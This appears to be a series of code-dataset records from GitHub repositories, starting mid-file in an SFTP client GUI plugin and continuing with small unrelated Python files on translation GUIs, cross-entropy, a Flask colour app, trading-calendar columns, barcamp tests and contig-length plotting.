directory.RemoteDirectory(self.application, config, ssh)\n\t\tsftp_utilities.get_object('SFTPClient.notebook.page_stfp.button_upload').connect('button-press-event', lambda widget, event: self._queue_transfer_from_selection(tasks.UploadTask))\n\t\tsftp_utilities.get_object('SFTPClient.notebook.page_stfp.button_download').connect('button-press-event', lambda widget, event: self._queue_transfer_from_selection(tasks.DownloadTask))\n\t\tself.local.menu_item_transfer.connect('activate', lambda widget: self._queue_transfer_from_selection(tasks.UploadTask))\n\t\tself.remote.menu_item_transfer.connect('activate', lambda widget: self._queue_transfer_from_selection(tasks.DownloadTask))\n\t\tself.local.menu_item_edit.connect('activate', self.signal_edit_file, self.local)\n\t\tself.remote.menu_item_edit.connect('activate', self.signal_edit_file, self.remote)\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_opts_transfer_hidden')\n\t\tmenu_item.set_active(self.config['transfer_hidden'])\n\t\tmenu_item.connect('toggled', self.signal_toggled_config_option, 'transfer_hidden')\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_opts_show_hidden')\n\t\tmenu_item.set_active(self.config['show_hidden'])\n\t\tmenu_item.connect('toggled', self.signal_toggled_config_option_show_hidden)\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_exit')\n\t\tmenu_item.connect('activate', lambda _: self.window.destroy())\n\t\tself.window.connect('destroy', self.signal_window_destroy)\n\t\tself.window.show_all()\n\n\tdef signal_change_page(self, _, __, page_number):\n\t\t\"\"\"\n\t\twill check to is if the page change is from editor to sftp, and then ask if the user if they\n\t\twant to save detected changes. If yes it passes to the save editor file to take action.\n\t\t\"\"\"\n\t\t# page_number is the page switched from\n\t\tif page_number:\n\t\t\treturn\n\t\tif not self.editor_tab_save_button.is_sensitive():\n\t\t\treturn\n\t\tif not gui_utilities.show_dialog_yes_no('Changes not saved', self.application.get_active_window(), 'Do you want to save your changes?'):\n\t\t\treturn\n\n\t\tself._save_editor_file()\n\n\tdef signal_edit_file(self, _, directory):\n\t\t\"\"\"\n\t\tHandles the signal when edit is selected on a file.\n\n\t\t:param _: Gtkmenuitem unused\n\t\t:param directory: The local or remote directory\n\t\t\"\"\"\n\t\tselection = directory.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\ttry:\n\t\t\tfile_path = directory.get_abspath(model[treeiter][2])\n\t\texcept TypeError:\n\t\t\tlogger.warning('no file selected to edit')\n\t\t\treturn\n\n\t\tself.editor = editor.SFTPEditor(self.application, file_path, directory)\n\t\tself._load_editor_file()\n\n\tdef signal_editor_save(self, _):\n\t\tself._save_editor_file()\n\n\tdef _save_editor_file(self):\n\t\t\"\"\"\n\t\tHandles the save file action for the editor instance when button is pressed or when tabs are changed\n\t\t\"\"\"\n\t\tif not self.editor:\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\tself.notebook.set_current_page(0)\n\t\t\tself.notebook.set_show_tabs(False)\n\t\t\treturn\n\n\t\tbuffer_contents = self.editor.sourceview_buffer.get_text(\n\t\t\tself.editor.sourceview_buffer.get_start_iter(),\n\t\t\tself.editor.sourceview_buffer.get_end_iter(),\n\t\t\tFalse\n\t\t)\n\t\tif buffer_contents == self.editor.file_contents:\n\t\t\tlogger.debug('editor found nothing to save')\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\treturn\n\n\t\tbuffer_contents = buffer_contents.encode('utf-8')\n\n\t\ttry:\n\t\t\tself.editor.directory.write_file(self.editor.file_path, buffer_contents)\n\t\t\tself.editor.file_contents = buffer_contents\n\t\t\tlogger.info(\"saved editor contents to {} file path {}\".format(self.editor.file_location, self.editor.file_path))\n\t\texcept IOError:\n\t\t\tlogger.warning(\"could not write to {} file: {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Permission Denied',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\"Cannot write to {} file\".format(self.editor.file_location)\n\t\t\t)\n\t\t\treturn\n\t\tself.editor_tab_save_button.set_sensitive(False)\n\n\tdef _load_editor_file(self):\n\t\t\"\"\"\n\t\tUsed to get and load the file contains of the SFTPEditor instance,\n\t\tand handle any errors found during the process\n\t\t\"\"\"\n\t\tif not self.editor:\n\t\t\treturn\n\n\t\ttry:\n\t\t\tfile_contents = self.editor.directory.read_file(self.editor.file_path)\n\t\t\tfile_contents = file_contents.decode('utf-8')\n\t\texcept IOError:\n\t\t\tlogger.warning(\"cannot read {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Permission Denied',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\"Cannot read {} file\".format(self.editor.file_location)\n\t\t\t)\n\t\t\treturn\n\t\texcept UnicodeDecodeError:\n\t\t\tlogger.warning(\"could not decode content of {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Error decoding file',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t'Can only edit utf-8 encoded file types.'\n\t\t\t)\n\t\t\treturn\n\n\t\tif isinstance(file_contents, bytes):\n\t\t\ttry:\n\t\t\t\tfile_contents = file_contents.decode('utf-8')\n\t\t\texcept UnicodeDecodeError:\n\t\t\t\tlogger.warning(\"could not decode content of {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Error decoding file',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Can only edit utf-8 encoded file types.'\n\t\t\t\t)\n\t\t\t\treturn\n\n\t\tself.notebook.set_show_tabs(True)\n\t\tself.editor.load_file(file_contents)\n\t\tself.notebook.set_current_page(1)\n\n\tdef signal_toggled_config_option(self, menuitem, config_key):\n\t\tself.config[config_key] = menuitem.get_active()\n\n\tdef signal_toggled_config_option_show_hidden(self, menuitem):\n\t\tself.config['show_hidden'] = menuitem.get_active()\n\t\tself.local.refilter()\n\t\tself.remote.refilter()\n\n\tdef _transfer_dir(self, task):\n\t\ttask.state = 'Transferring'\n\t\tif isinstance(task, tasks.DownloadTask):\n\t\t\tdst, dst_path = self.local, task.local_path\n\t\telif isinstance(task, tasks.UploadTask):\n\t\t\tdst, dst_path = self.remote, task.remote_path\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tif not stat.S_ISDIR(dst.path_mode(dst_path)):\n\t\t\tdst.make_dir(dst_path)\n\n\t\tif not task.size:\n\t\t\ttask.state = 'Completed'\n\n\tdef _transfer_file(self, task, chunk=0x1000):\n\t\ttask.state = 'Transferring'\n\t\tself.status_display.sync_view(task)\n\t\tftp = self.remote.ftp_acquire()\n\t\twrite_mode = 'ab+' if task.transferred > 0 else 'wb+'\n\t\tif isinstance(task, tasks.UploadTask):\n\t\t\tsrc_file_h = open(task.local_path, 'rb')\n\t\t\tdst_file_h = ftp.file(task.remote_path, write_mode)\n\t\telif isinstance(task, tasks.DownloadTask):\n\t\t\tsrc_file_h = ftp.file(task.remote_path, 'rb')\n\t\t\tdst_file_h = open(task.local_path, write_mode)\n\t\telse:\n\t\t\tself.remote.ftp_release()\n\t\t\traise ValueError('unsupported task type passed to _transfer_file')\n\t\tself.remote.ftp_release()\n\t\tsrc_file_h.seek(task.transferred)\n\t\ttry:\n\t\t\twhile task.transferred < task.size:\n\t\t\t\tif self._threads_shutdown.is_set():\n\t\t\t\t\ttask.state = 'Cancelled'\n\t\t\t\tif task.state != 'Transferring':\n\t\t\t\t\tbreak\n\t\t\t\ttemp = src_file_h.read(chunk)\n\t\t\t\tdst_file_h.write(temp)\n\t\t\t\ttask.transferred += chunk\n\t\t\t\tself.status_display.sync_view(task)\n\t\texcept Exception as error:\n\t\t\traise error\n\t\tfinally:\n\t\t\tsrc_file_h.close()\n\t\t\tdst_file_h.close()\n\t\tif task.state == 'Cancelled':\n\t\t\tif isinstance(task, tasks.UploadTask):\n\t\t\t\tself.remote.remove_by_file_name(task.remote_path)\n\t\t\telif isinstance(task, tasks.DownloadTask):\n\t\t\t\tself.local.remove_by_file_name(task.local_path)\n\t\telif task.state != 'Paused':\n\t\t\ttask.state = 'Completed'\n\t\t\tGLib.idle_add(self._idle_refresh_directories)\n\n\tdef _idle_refresh_directories(self):\n\t\tself.local.refresh()\n\t\tself.remote.refresh()\n\n\tdef _thread_routine(self):\n\t\twhile not self._threads_shutdown.is_set():\n\t\t\ttask = self.queue.get()\n\t\t\tif isinstance(task, tasks.ShutdownTask):\n\t\t\t\tlogger.info('processing task: ' + str(task))\n\t\t\t\ttask.state = 'Completed'\n\t\t\t\tself.queue.remove(task)\n\t\t\t\tbreak\n\t\t\telif isinstance(task, tasks.TransferTask):\n\t\t\t\tlogger.debug('processing task: ' + str(task))\n\t\t\t\ttry:\n\t\t\t\t\tif isinstance(task, tasks.TransferDirectoryTask):\n\t\t\t\t\t\tself._transfer_dir(task)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._transfer_file(task)\n\t\t\t\texcept Exception:\n\t\t\t\t\tlogger.error(\"unknown error processing task: {0!r}\".format(task), exc_info=True)\n\t\t\t\t\tif not task.is_done:\n\t\t\t\t\t\ttask.state = 'Error'\n\t\t\t\t\t\tfor parent in task.parents:\n\t\t\t\t\t\t\tparent.state = 'Error'\n\t\t\t\tself.status_display.sync_view([task] + task.parents)\n\n\tdef signal_window_destroy(self, _):\n\t\tself.window.set_sensitive(False)\n\t\tself._threads_shutdown.set()\n\t\tfor _ in self._threads:\n\t\t\tself.queue.put(tasks.ShutdownTask())\n\t\tfor thread in self._threads:\n\t\t\tthread.join()\n\t\tself.local.shutdown()\n\t\tself.remote.shutdown()\n\t\tdirectories = self.config.get('directories', {})\n\t\tdirectories['local'] = {\n\t\t\t'current': self.local.cwd,\n\t\t\t'history': list(self.local.wd_history)\n\t\t}\n\t\tif 'remote' not in directories:\n\t\t\tdirectories['remote'] = {}\n\t\tdirectories['remote'][self.application.config['server'].split(':', 1)[0]] = list(self.remote.wd_history)\n\t\tself.config['directories'] = directories\n\t\tself.editor = None\n\t\tsftp_utilities._gtk_objects = {}\n\t\tsftp_utilities._builder = None\n\n\tdef _queue_transfer_from_selection(self, task_cls):\n\t\tselection = self.local.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tlocal_path = self.local.cwd if treeiter is None else model[treeiter][2]\n\t\tif local_path is None:\n\t\t\tlogger.warning('can not queue a transfer when the local path is unspecified')\n\t\t\treturn\n\n\t\tselection = self.remote.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tremote_path = self.remote.cwd if treeiter is None else model[treeiter][2]\n\t\tif remote_path is None:\n\t\t\tlogger.warning('can not queue a transfer when the remote path is unspecified')\n\t\t\treturn\n\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc_path, dst_path = remote_path, local_path\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tsrc_path, dst_path = local_path, remote_path\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tself.queue_transfer(task_cls, src_path, dst_path)\n\n\tdef queue_transfer(self, task_cls, src_path, dst_path):\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc, dst = self.remote, self.local\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tsrc, dst = self.local, self.remote\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tif dst.get_is_folder(dst_path):\n\t\t\tdst_path = dst.path_mod.join(dst_path, src.path_mod.basename(src_path))\n\t\tif src.get_is_folder(src_path):\n\t\t\tself._queue_dir_transfer(task_cls, src_path, dst_path)\n\t\telse:\n\t\t\tself._queue_file_transfer(task_cls, src_path, dst_path)\n\n\tdef _queue_file_transfer(self, task_cls, src_path, dst_path):\n\t\t\"\"\"\n\t\tHandles the file transfer by stopping bad transfers, creating tasks for\n\t\ttransfers, and placing them in the queue.\n\n\t\t:param task_cls: The type of task the transfer will be.\n\t\t:param str src_path: The source path to be uploaded or downloaded.\n\t\t:param str dst_path: The destination path to be created and data transferred into.\n\t\t\"\"\"\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tif not os.access(os.path.dirname(dst_path), os.W_OK):\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Permission Denied',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Cannot write to the destination folder.'\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\tlocal_path, remote_path = self.local.get_abspath(dst_path), self.remote.get_abspath(src_path)\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tif not os.access(src_path, os.R_OK):\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Permission Denied',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Cannot read the source file.'\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\tlocal_path, remote_path = self.local.get_abspath(src_path), self.remote.get_abspath(dst_path)\n\t\tfile_task = task_cls(local_path, remote_path)\n\t\tif isinstance(file_task, tasks.UploadTask):\n\t\t\tfile_size = self.local.get_file_size(local_path)\n\t\telif isinstance(file_task, tasks.DownloadTask):\n\t\t\tfile_size = self.remote.get_file_size(remote_path)\n\t\tfile_task.size = file_size\n\t\tself.queue.put(file_task)\n\t\tself.status_display.sync_view(file_task)\n\n\tdef _queue_dir_transfer(self, task_cls, src_path, dst_path):\n\t\t\"\"\"\n\t\tHandles the folder transfer by stopping bad transfers, creating tasks\n\t\tfor transfers, and placing them in the queue.\n\n\t\t:param task_cls: The type of task the transfer will be.\n\t\t:param str src_path: The path to be uploaded or downloaded.\n\t\t:param str dst_path: The path to be created.\n\t\t\"\"\"\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc, dst = self.remote, self.local\n\t\t\tif not os.access(dst.path_mod.dirname(dst_path), os.W_OK):\n\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not write to the destination directory.')\n\t\t\t\treturn\n\t\t\ttask = task_cls.dir_cls(dst_path, src_path, size=0)\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tif not os.access(src_path, os.R_OK):\n\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not read the source directory.')\n\t\t\t\treturn\n\t\t\tsrc, dst = self.local, self.remote\n\t\t\ttask = task_cls.dir_cls(src_path, dst_path, size=0)\n\t\t\tif not stat.S_ISDIR(dst.path_mode(dst_path)):\n\t\t\t\ttry:\n\t\t\t\t\tdst.make_dir(dst_path)\n\t\t\t\texcept (IOError, OSError):\n\t\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not create the destination directory.')\n\t\t\t\t\treturn\n\t\telse:\n\t\t\traise ValueError('unknown task class')\n\n\t\tqueued_tasks = []\n\t\tparent_directory_tasks = collections.OrderedDict({src_path: task})\n\n\t\tfor dir_cont in src.walk(src_path):\n\t\t\tdst_base_path = dst.path_mod.normpath(dst.path_mod.join(dst_path, src.get_relpath(dir_cont.dirpath, start=src_path)))\n\t\t\tsrc_base_path = dir_cont.dirpath\n\t\t\tparent_task = parent_directory_tasks.pop(src_base_path, None)\n\t\t\tif parent_task is None:\n\t\t\t\tcontinue\n\t\t\tqueued_tasks.append(parent_task)\n\n\t\t\tnew_task_count = 0\n\t\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\t\tlocal_base_path, remote_base_path = (dst_base_path, src_base_path)\n\t\t\telse:\n\t\t\t\tlocal_base_path, remote_base_path = (src_base_path, dst_base_path)\n\n\t\t\tfor filename in dir_cont.filenames:\n\t\t\t\tif not self.config['transfer_hidden'] and src.path_is_hidden(src.path_mod.join(src_base_path, filename)):\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\tfile_size = src.get_file_size(src.path_mod.join(dir_cont.dirpath, filename))\n\t\t\t\texcept (IOError, OSError):\n\t\t\t\t\tcontinue # skip this file if we can't get it's size\n\t\t\t\ttask = task_cls(\n\t\t\t\t\tself.local.path_mod.join(local_base_path, filename),\n\t\t\t\t\tself.remote.path_mod.join(remote_base_path, filename),\n\t\t\t\t\tparent=parent_task,\n\t\t\t\t\tsize=file_size\n\t\t\t\t)\n\t\t\t\tqueued_tasks.append(task)\n\t\t\t\tnew_task_count += 1\n\n\t\t\tfor dirname in dir_cont.dirnames:\n\t\t\t\tif not self.config['transfer_hidden'] and src.path_is_hidden(src.path_mod.join(src_base_path, dirname)):\n\t\t\t\t\tcontinue\n\t\t\t\ttask = task_cls.dir_cls(\n\t\t\t\t\tself.local.path_mod.join(local_base_path, dirname),\n\t\t\t\t\tself.remote.path_mod.join(remote_base_path, dirname),\n\t\t\t\t\tparent=parent_task,\n\t\t\t\t\tsize=0\n\t\t\t\t)\n\t\t\t\tparent_directory_tasks[src.path_mod.join(src_base_path, dirname)] = task\n\t\t\t\tnew_task_count += 1\n\n\t\t\tparent_task.size += new_task_count\n\t\t\tfor grandparent_task in parent_task.parents:\n\t\t\t\tgrandparent_task.size += new_task_count\n\t\tfor task in queued_tasks:\n\t\t\tself.queue.put(task)\n\t\tself.status_display.sync_view(queued_tasks)\n","repo_name":"ProsAndCons/king-phisher-plugins","sub_path":"client/sftp_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":23915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10478350207","text":"import PySimpleGUI as sg\nimport threading\n\nimport my_layout\nfrom src.utils.utils_func import translate\n\nTHREAD_EVENT = '-THREAD-'\n\ncp = sg.cprint\n\n\ndef run_gui(title, layout, events: dict = None, **kwargs):\n window = sg.Window(title, layout.get_layout(), **kwargs)\n while True:\n event, values = window.read()\n if event == '_FROM_':\n item = values[event]\n combo_values = layout.get_data(item)\n window['_TO_'].update(value=combo_values[0], values=combo_values)\n if event == \"Translate\":\n model = f\"{values['_FROM_'].get_model()}-{values['_TO_'].get_model()}\"\n print(model)\n threading.Thread(target=translate, args=(window, values[0], model,), daemon=True).start()\n if event == THREAD_EVENT:\n window[\"-OUT-\" + sg.WRITE_ONLY_KEY].Update('')\n cp(f'{values[THREAD_EVENT]}')\n if event == sg.WIN_CLOSED:\n break\n window.close()\n\n\nif __name__ == '__main__':\n myLayout = my_layout.Layout()\n run_gui(\"Test_Run\", myLayout, finalize=True)\n","repo_name":"BartoszSlesar/PythonSimpleTranslationGui","sub_path":"src/simple_gui/simple_gui.py","file_name":"simple_gui.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4243027091","text":"import numpy as np\r\n\r\n\r\ndef cross_entropy(targets, predictions, epsilon=1e-12):\r\n targets = np.array(targets)\r\n predictions = np.array(predictions)\r\n if len(targets.shape) == 1:\r\n targets = np.expand_dims(targets, 0)\r\n if len(predictions.shape) == 1:\r\n predictions = np.expand_dims(predictions, 0)\r\n\r\n predictions = np.clip(predictions, epsilon, 1. - epsilon)\r\n cross_entropies = -np.sum(targets * np.log(predictions), axis=1)\r\n if len(cross_entropies == 1):\r\n return cross_entropies[0]\r\n else:\r\n return cross_entropies\r\n","repo_name":"tobias-kirschstein/alpha-one","sub_path":"alpha_one/metrics/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19747686751","text":"# 15. Write a program that prints a giant letter A like the one below. Allow\r\n# the user to specify how large the letter should be.\r\n\r\nwhile True:\r\n try:\r\n height = int(input(\"Enter height of letter A: \"))\r\n break\r\n except ValueError:\r\n print(\"Invalid argument.\")\r\n\r\nfor i in range(height):\r\n print(\" \"*(height-i) + \"*\")\r\n\r\n# Not Completely Finished","repo_name":"gregorioacerussell/CPEN60-Laboratory-Manual","sub_path":"2.5 Exercises/(15) 2.5 Exercises.py","file_name":"(15) 2.5 Exercises.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37688437374","text":"from flask import Flask, request, render_template\nimport SkinGenerator\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/print_color', methods=['POST'])\ndef print_color():\n data = request.get_json()\n color = data.get('color')\n contrast = data.get('sliderValue')\n\n # convert that rgb color (formatted orginally as \"rgb(255, 255, 255)\") to hex\n color = color[4:-1].split(\", \")\n color = [int(i) for i in color]\n color = '#%02x%02x%02x' % tuple(color)\n print(color)\n\n # generate the skin\n SkinGenerator.generate_skin(color, contrast)\n\n return 'Color received successfully'\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"CheckMC/skin-changer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34312995677","text":"from Bio import PDB\nimport pandas as pd\n\nfrom biodescriptors.calc import utils\n\n\ndef _calc_sse_content(dssp):\n \"\"\"Calculation of secondary structure content.\"\"\"\n\n # preparing for extruction sse from dssp structure\n resamount = len(dssp.keys()) + 1\n dssp_structures = ['H', 'B', 'E', 'G', 'I', 'T', 'S']\n sses = list()\n\n # extracting sse from dssp\n for i in range(0, len(dssp.keys())):\n if dssp[list(dssp.keys())[i]][2] in dssp_structures:\n sses.append(dssp[list(dssp.keys())[i]][2])\n\n # making dict of all possible secondary structures and counting their percentage\n sse = {'Helix': sses.count('H') / resamount * 100,\n 'Beta bridge': sses.count('B') / resamount * 100,\n 'Strand': sses.count('E') / resamount * 100,\n 'Helix-3': sses.count('G') / resamount * 100,\n 'Helix-5': sses.count('I') / resamount * 100,\n 'Turn': sses.count('T') / resamount * 100,\n 'Bend': sses.count('S') / resamount * 100,\n 'Other': (resamount - len(sses)) / resamount * 100}\n\n return sse\n\n\ndef calc_sse_content(pdb_file):\n \"\"\"\n Calculation of secondary structure content.\n\n Parameters\n ----------\n pdb_file: str\n Filename of .pdb file used for calculation.\n\n Returns\n -------\n dict of all possible secondary structures and counting their percentage.\n\n \"\"\"\n _, _, model, _, _ = utils.get_model_and_structure(pdb_file)\n dssp = PDB.DSSP(model, pdb_file)\n return _calc_sse_content(dssp)\n\n\ndef sse_content_to_pandas(pdb_file, protein_name=None, **kwargs):\n \"\"\"\n Putting secondary structure content in pandas dataframe.\n\n Parameters\n ----------\n pdb_file: str\n Filename of .pdb file used for calculation.\n protein_name: str, default=None\n Protein name to be added to the resulting dataframe.\n\n Returns\n -------\n pandas.DataFrame with calculated descriptor.\n\n \"\"\"\n cols_sse = ['prot_name', 'SSE Helix', 'SSE Beta bridge',\n 'SSE Strand', 'SSE Helix-3', 'SSE Helix-5',\n 'SSE Turn', 'SSE Bend', 'SSE Other']\n df_sse = pd.DataFrame(columns=cols_sse)\n sse = None\n try:\n sse = calc_sse_content(pdb_file)\n except KeyError:\n if protein_name:\n print(f'{protein_name}: KeyError while calculating sse')\n else:\n print('KeyError while calculating sse')\n\n except ValueError as e:\n if protein_name:\n print(f'{protein_name}: {e}')\n else:\n print(e)\n\n data_sse = [protein_name]\n if sse is not None:\n for struct in sse:\n data_sse.append(sse[struct])\n df_sse = df_sse.append(pd.Series(data_sse, index=cols_sse[0:len(data_sse)]), ignore_index=True)\n return df_sse\n","repo_name":"GlukhovIgor/Descriptors_package","sub_path":"src/biodescriptors/calc/calc_sse_content.py","file_name":"calc_sse_content.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7980827777","text":"import pandas as pd\nfrom steps.src.data_processing import DataProcessor\nfrom zenml.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef get_data_for_test() -> pd.DataFrame:\n \"\"\"Utility function for getting sample data for test\"\"\"\n try:\n df = pd.read_csv(\"./data/customer-churn-data.csv\")\n df = df.sample(n=100)\n data_clean = DataProcessor()\n df = data_clean.encode_categorical_columns(df)\n df.drop([\"Churn\"], axis=1, inplace=True)\n return df\n except Exception as e:\n logger.error(e)\n raise e\n","repo_name":"zenml-io/zenml-projects","sub_path":"customer-churn/pipelines/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"53"} +{"seq_id":"1827686915","text":"\"\"\"\ncalendar\n---------\nAdds calendar columns to a dataframe\n\ndotw: day of the week with Monday=0, Sunday=6\ndotm: day of the month as 1,2,...\ndoty: day of the year as 1,2, ...\nmonth: month as January=1,...,December=12\nfirst_dotw: first trading day of the week\nlast_dotw: last trading day of the week\nfirst_dotm: first trading day of the month\nlast_dotm: last trading day of the month\nfirst_doty: first trading day of the year\nlast_doty: last trading day of the year\n\n\"\"\"\n\n# Use future imports for python 3.0 forward compatibility\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\n\n# other imports\nimport pandas as pd\nfrom itertools import izip\nimport pinkfish as pf\n\ndef _first_day(row):\n first_dotw = row['dotw'] < row['__prev_dotw__']\n first_dotm = row['dotm'] < row['__prev_dotm__']\n first_doty = row['doty'] < row['__prev_doty__']\n\n return first_dotw, first_dotm, first_doty\n\ndef calendar(ts):\n \"\"\" returns timeseries with calendar columns added \"\"\"\n\n # day of the week with Monday=0, Sunday=6\n ts['dotw'] = ts.index.dayofweek\n\n # day of the month\n ts['dotm'] = ts.index.day\n\n # day of the year\n ts['doty'] = ts.index.dayofyear\n\n # month as January=1, December=12\n ts['month'] = ts.index.month\n\n # Temporarily add __prev_dotw__, __prev_dotm__, __prev_doty__\n # for convenience; drop them later\n ts['__prev_dotw__'] = ts['dotw'].shift()\n ts['__prev_dotw__'].fillna(0, inplace=True)\n\n ts['__prev_dotm__'] = ts['dotm'].shift()\n ts['__prev_dotm__'].fillna(0, inplace=True)\n\n ts['__prev_doty__'] = ts['doty'].shift()\n ts['__prev_doty__'].fillna(0, inplace=True)\n\n # First and last day of the week, month, and year\n ts['first_dotw'], ts['first_dotm'], ts['first_doty'] = \\\n izip(*ts.apply(_first_day, axis=1))\n\n ts['last_dotw'] = ts['first_dotw'].shift(-1)\n ts['last_dotw'].fillna(False, inplace=True)\n\n ts['last_dotm'] = ts['first_dotm'].shift(-1)\n ts['last_dotm'].fillna(False, inplace=True)\n\n ts['last_doty'] = ts['first_doty'].shift(-1)\n ts['last_doty'].fillna(False, inplace=True)\n\n # Drop temporary columns\n ts.drop(columns=['__prev_dotw__', '__prev_dotm__', '__prev_doty__'], inplace=True)\n\n return ts\n\n","repo_name":"ArnoldKuo/pinkfish","sub_path":"pinkfish/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"45145464318","text":"from camper.db import BarcampSchema, Barcamp\nimport datetime\n\ndef test_simple(barcamps):\n barcamp = Barcamp(\n name = \"Barcamp\",\n description = \"cool barcamp\",\n slug = \"barcamp\",\n start_date = datetime.date(2012,7,13),\n end_date = datetime.date(2012,7,15)\n )\n barcamps.save(barcamp)\n\n barcamp = barcamps.by_slug(\"barcamp\")\n assert barcamp.name == \"Barcamp\"\n assert barcamp.registration_date == None\n\ndef test_event(barcamps):\n barcamp = Barcamp(\n name = \"Barcamp\",\n description = \"cool barcamp\",\n slug = \"barcamp\",\n location = {\n 'name' : \"Example City\",\n },\n start_date = datetime.date(2012,7,13),\n end_date = datetime.date(2012,7,15)\n )\n bc = barcamps.save(barcamp)\n\n bc = barcamps.get(bc._id)\n\n assert len(bc.events) == 1\n assert bc.events[0]['name'] == \"Barcamp\"\n\n\n\n\n \n","repo_name":"comlounge/baustellenac","sub_path":"baustellenac/db/tests/test_sites.py","file_name":"test_sites.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31882604887","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfile1 = \"../7_pilon/consensus_pilon.fasta\" # One Quiver and Pilon Polishing\nfile2 = \"../../rawdata/REF/HGAP_assembly.fasta\" # illumina contig reference\nfile3 = \"../../rawdata/REF/illumina_MPG_2013_contig.fasta\" # HGAP Assembly\n\ndef get_stats(f):\n '''\n This function calculate the length of each contig and return a list contains all the contigs' length.\n '''\n temp = []\n contig_len = []\n with open(f) as file:\n for line in file:\n if line[0] != '>':\n temp.append(line)\n elif line[0] == '>' and len(temp) != 0:\n nt_len = []\n for nt in temp:\n if len(nt) != 0:\n nt_len.append(len(nt))\n contig_len.append(sum(nt_len))\n return contig_len\n\n\n# making graph\n\nx1 = sorted(get_stats(file1), reverse=True)\nx2 = sorted(get_stats(file2), reverse=True)\nx3 = sorted(get_stats(file3), reverse=True)\n\n\ny1 = np.arange(1, len(x1)+1) / len(x1)\ny2 = np.arange(1, len(x2)+1) / len(x2)\ny3 = np.arange(1, len(x3)+1) / len(x3)\n\n\nplt.xlim(12000000, 0) # inverse the x axis\n\nplot1 = plt.plot(x1, y1, marker = '.', linestyle = '-')\nplot2 = plt.plot(x2, y2, marker = '.', linestyle = '-')\nplot3 = plt.plot(x3, y3, marker = '.', linestyle = '-')\n\nplt.legend(['One Quiver and Pilon Polishing', 'Illumina Reference', \"HGAP Assembly\"], loc='best')\n\nplt.xlabel(\"Contig 